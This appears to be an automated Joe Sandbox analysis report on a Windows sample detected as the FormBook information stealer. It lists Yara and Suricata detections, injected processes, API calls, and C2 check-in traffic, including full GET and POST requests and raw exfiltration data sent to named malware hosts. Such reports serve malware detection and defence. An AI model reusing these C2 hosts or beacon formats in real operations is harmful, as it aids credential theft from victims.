Windows Analysis Report
oLCnCWQDhK.exe

AI detected suspicious sample

Source: Yara match	File source: 2.2.svchost.exe.690000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2503030807.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1910782362.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2505420589.0000000004950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2505519891.00000000049A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1910510903.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2505688280.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1911128401.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: oLCnCWQDhK.exe

Joe Sandbox ML: detected

Source: oLCnCWQDhK.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: wextract.pdb source: svchost.exe, 00000002.00000003.1878117159.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1877944865.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, EthPSueuMbeZ.exe, 0000000C.00000002.2504917914.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, EthPSueuMbeZ.exe, 0000000C.00000003.1848017873.00000000014CB000.00000004.00000020.00020000.00000000.sdmp, EthPSueuMbeZ.exe, 0000000C.00000002.2504917914.00000000014EB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wextract.pdbGCTL source: svchost.exe, 00000002.00000003.1878117159.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1877944865.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, EthPSueuMbeZ.exe, 0000000C.00000002.2504917914.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, EthPSueuMbeZ.exe, 0000000C.00000003.1848017873.00000000014CB000.00000004.00000020.00020000.00000000.sdmp, EthPSueuMbeZ.exe, 0000000C.00000002.2504917914.00000000014EB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EthPSueuMbeZ.exe, 0000000C.00000002.2503183301.0000000000C6E000.00000002.00000001.01000000.00000005.sdmp, EthPSueuMbeZ.exe, 00000010.00000000.1979513751.0000000000C6E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: oLCnCWQDhK.exe, 00000000.00000003.1260700980.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, oLCnCWQDhK.exe, 00000000.00000003.1261561282.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1806232459.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1910830635.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804230710.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1910830635.000000000339E000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 0000000D.00000003.1916948837.0000000004AE3000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000003.1910808388.000000000493E000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.2505832283.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.2505832283.0000000004E2E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: oLCnCWQDhK.exe, 00000000.00000003.1260700980.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, oLCnCWQDhK.exe, 00000000.00000003.1261561282.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1806232459.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1910830635.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804230710.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1910830635.000000000339E000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, wextract.exe, 0000000D.00000003.1916948837.0000000004AE3000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000003.1910808388.000000000493E000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.2505832283.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.2505832283.0000000004E2E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: wextract.exe, 0000000D.00000002.2506247486.00000000052BC000.00000004.10000000.00040000.00000000.sdmp, wextract.exe, 0000000D.00000002.2503345244.0000000002DF5000.00000004.00000020.00020000.00000000.sdmp, EthPSueuMbeZ.exe, 00000010.00000000.1980107532.000000000316C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2249916942.000000001C32C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: wextract.exe, 0000000D.00000002.2506247486.00000000052BC000.00000004.10000000.00040000.00000000.sdmp, wextract.exe, 0000000D.00000002.2503345244.0000000002DF5000.00000004.00000020.00020000.00000000.sdmp, EthPSueuMbeZ.exe, 00000010.00000000.1980107532.000000000316C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2249916942.000000001C32C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00452492
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00442886
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_004788BD
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_004339B6
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,	0_2_0045CAFA
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00431A86
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	0_2_0044BD27
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0045DE8F FindFirstFileW,FindClose,	0_2_0045DE8F
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0044BF8B
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_02CDC030 FindFirstFileW,FindNextFileW,FindClose,	13_2_02CDC030

Source: C:\Windows\SysWOW64\wextract.exe	Code function: 4x nop then xor eax, eax	13_2_02CC9B40
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 4x nop then pop edi	13_2_02CCDBBE
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 4x nop then mov ebx, 00000004h	13_2_04AA04DE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49970 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49973 -> 198.44.251.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49972 -> 198.44.251.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49971 -> 198.44.251.203:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49974 -> 198.44.251.203:80

Source: Joe Sandbox View

IP Address: 84.32.84.32 84.32.84.32

Source: Joe Sandbox View	ASN Name: NTT-LT-ASLT NTT-LT-ASLT
Source: Joe Sandbox View	ASN Name: IKGUL-26484US IKGUL-26484US

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,

0_2_004422FE

Source: global traffic	HTTP traffic detected: GET /wlo5/?FBeh=CM5svj/Jqf1poSHeMj5/r+NnqEfLZZItIQ95L2yXLG/JG/00oonc4yb62CzIQH5xpFXAP6Ke6nqsuzHIo+F+y7v4YQSe8tbNC1hB8RVd0xhKZiYo2oKcfdFxxvEt5bq2V2swyTcdbe6T&DfhDq=hvZ8HhLP1L HTTP/1.1Host: www.servehimfoundation.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /2i77/?FBeh=LTODvrhkMVqC3PKCaJdvO2t6hDsejrMuF+eBTdKoQS/6ei5HfNTQm76vsHOzwLCg1kh0lrMBTIeoxNiIEVh8EQZRdYH26u2LqJt1YWeMJrh5ZIo+pKpB+Wc3K2X12eL+1JIO5dLCeoUs&DfhDq=hvZ8HhLP1L HTTP/1.1Host: www.n0pme6.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.timetime.store
Source: global traffic	DNS traffic detected: DNS query: www.servehimfoundation.org
Source: global traffic	DNS traffic detected: DNS query: www.n0pme6.top

Source: unknown

HTTP traffic detected: POST /2i77/ HTTP/1.1Host: www.n0pme6.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.n0pme6.topContent-Length: 217Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedConnection: closeReferer: http://www.n0pme6.top/2i77/User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36Data Raw: 46 42 65 68 3d 47 52 6d 6a 73 65 46 68 43 55 65 4e 32 2f 6d 65 57 59 46 78 4a 44 46 71 72 67 6f 65 6c 72 49 6e 4c 72 76 53 53 38 37 65 4d 48 33 43 51 67 6c 79 54 76 2f 79 2f 38 58 6c 73 47 4b 34 38 5a 36 68 35 46 5a 4c 6b 4f 77 67 65 37 58 70 2f 65 4c 72 49 45 39 4c 4a 31 64 65 57 62 7a 48 38 4f 37 73 71 62 4a 4e 4a 58 61 31 58 70 68 47 47 35 4e 79 68 70 35 71 2f 47 59 56 42 47 2f 74 39 2b 4c 66 31 63 41 56 73 36 4b 44 4c 50 38 35 61 75 66 48 31 65 6b 53 33 41 76 31 6d 49 51 37 47 45 45 55 79 57 4b 70 34 44 43 58 72 62 35 38 73 43 70 38 30 46 58 64 2f 46 44 4a 70 33 58 6b 6d 32 71 34 55 6d 41 7a 39 30 36 66 51 59 77 45 38 66 77 57 45 41 3d 3d Data Ascii: FBeh=GRmjseFhCUeN2/meWYFxJDFqrgoelrInLrvSS87eMH3CQglyTv/y/8XlsGK48Z6h5FZLkOwge7Xp/eLrIE9LJ1deWbzH8O7sqbJNJXa1XphGG5Nyhp5q/GYVBG/t9+Lf1cAVs6KDLP85aufH1ekS3Av1mIQ7GEEUyWKp4DCXrb58sCp80FXd/FDJp3Xkm2q4UmAz906fQYwE8fwWEA==

Source: EthPSueuMbeZ.exe, 00000010.00000002.2504820863.0000000001285000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.n0pme6.top
Source: EthPSueuMbeZ.exe, 00000010.00000002.2504820863.0000000001285000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.n0pme6.top/2i77/
Source: wextract.exe, 0000000D.00000003.2143247875.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: wextract.exe, 0000000D.00000003.2143247875.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: wextract.exe, 0000000D.00000003.2143247875.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: wextract.exe, 0000000D.00000003.2143247875.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: wextract.exe, 0000000D.00000003.2143247875.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: wextract.exe, 0000000D.00000003.2143247875.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: wextract.exe, 0000000D.00000003.2143247875.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: wextract.exe, 0000000D.00000002.2503345244.0000000002E10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: wextract.exe, 0000000D.00000002.2503345244.0000000002E40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: wextract.exe, 0000000D.00000002.2503345244.0000000002E10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: wextract.exe, 0000000D.00000002.2503345244.0000000002E10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: wextract.exe, 0000000D.00000002.2503345244.0000000002E10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: wextract.exe, 0000000D.00000002.2503345244.0000000002E40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: wextract.exe, 0000000D.00000003.2138947733.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: wextract.exe, 0000000D.00000003.2143247875.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: wextract.exe, 0000000D.00000003.2143247875.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0045A10F

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0045A10F

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,

0_2_0046DC80

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,

0_2_0044C37A

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_0047C81C SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,742845F0,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,6FDECB00,6FDEC2F0,SetCapture,ClientToScreen,6FDEC530,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,742845F0,

0_2_0047C81C

E-Banking Fraud

Malicious sample detected (through community Yara rule)

Source: Yara match	File source: 2.2.svchost.exe.690000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2503030807.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1910782362.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2505420589.0000000004950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2505519891.00000000049A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1910510903.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2505688280.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1911128401.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 2.2.svchost.exe.690000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2503030807.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1910782362.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2505420589.0000000004950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2505519891.00000000049A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1910510903.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.2505688280.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1911128401.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0046A07E PostMessageW,GetFocus,GetDlgCtrlID,PostMessageW,NtdllDialogWndProc_W,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	0_2_0046A07E
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_004710F1 NtdllDialogWndProc_W,6FDEC580,6FDEC6F0,ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	0_2_004710F1
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0045034C GetParent,NtdllDialogWndProc_W,	0_2_0045034C
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0044036A NtdllDialogWndProc_W,	0_2_0044036A
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_00440306 NtdllDialogWndProc_W,	0_2_00440306
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0047132F NtdllDialogWndProc_W,	0_2_0047132F
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_00440338 NtdllDialogWndProc_W,	0_2_00440338
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0046A38E NtdllDialogWndProc_W,NtdllDialogWndProc_W,	0_2_0046A38E
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0045039B GetParent,NtdllDialogWndProc_W,NtdllDialogWndProc_W,NtdllDialogWndProc_W,	0_2_0045039B
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_004404E8 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,	0_2_004404E8
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0044048E NtdllDialogWndProc_W,	0_2_0044048E
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0044786A NtdllDialogWndProc_W,	0_2_0044786A
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0047C81C SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,742845F0,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,6FDECB00,6FDEC2F0,SetCapture,ClientToScreen,6FDEC530,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,742845F0,	0_2_0047C81C
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_004478AC GetCursorPos,TrackPopupMenuEx,NtdllDialogWndProc_W,GetCursorPos,TrackPopupMenuEx,	0_2_004478AC
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_004479A0 GetClientRect,GetCursorPos,ScreenToClient,WindowFromPoint,NtdllDialogWndProc_W,	0_2_004479A0
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_004629B7 NtdllDialogWndProc_W,NtdllDialogWndProc_W,	0_2_004629B7
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0047EA6F NtdllDialogWndProc_W,	0_2_0047EA6F
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_00447ABC SendMessageW,NtdllDialogWndProc_W,	0_2_00447ABC
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_00447B4E NtdllDialogWndProc_W,	0_2_00447B4E
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_00454CFC NtdllDialogWndProc_W,	0_2_00454CFC
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_00454D4A NtdllDialogWndProc_W,	0_2_00454D4A
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0042FDA6 ClientToScreen,6FDEC5D0,NtdllDialogWndProc_W,	0_2_0042FDA6
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0042FE05 742845F0,NtdllDialogWndProc_W,	0_2_0042FE05
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_00470E96 DragQueryPoint,SendMessageW,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	0_2_00470E96
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_006BC003 NtClose,	2_2_006BC003
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272B60 NtClose,LdrInitializeThunk,	2_2_03272B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03272DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032735C0 NtCreateMutant,LdrInitializeThunk,	2_2_032735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03274340 NtSetContextThread,	2_2_03274340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03274650 NtSuspendThread,	2_2_03274650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272BA0 NtEnumerateValueKey,	2_2_03272BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272B80 NtQueryInformationFile,	2_2_03272B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272BE0 NtQueryValueKey,	2_2_03272BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272BF0 NtAllocateVirtualMemory,	2_2_03272BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272AB0 NtWaitForSingleObject,	2_2_03272AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272AF0 NtWriteFile,	2_2_03272AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272AD0 NtReadFile,	2_2_03272AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272F30 NtCreateSection,	2_2_03272F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272F60 NtCreateProcessEx,	2_2_03272F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272FA0 NtQuerySection,	2_2_03272FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272FB0 NtResumeThread,	2_2_03272FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272F90 NtProtectVirtualMemory,	2_2_03272F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272FE0 NtCreateFile,	2_2_03272FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272E30 NtWriteVirtualMemory,	2_2_03272E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272EA0 NtAdjustPrivilegesToken,	2_2_03272EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272E80 NtReadVirtualMemory,	2_2_03272E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272EE0 NtQueueApcThread,	2_2_03272EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272D30 NtUnmapViewOfSection,	2_2_03272D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272D00 NtSetInformationFile,	2_2_03272D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272D10 NtMapViewOfSection,	2_2_03272D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272DB0 NtEnumerateKey,	2_2_03272DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272DD0 NtDelayExecution,	2_2_03272DD0
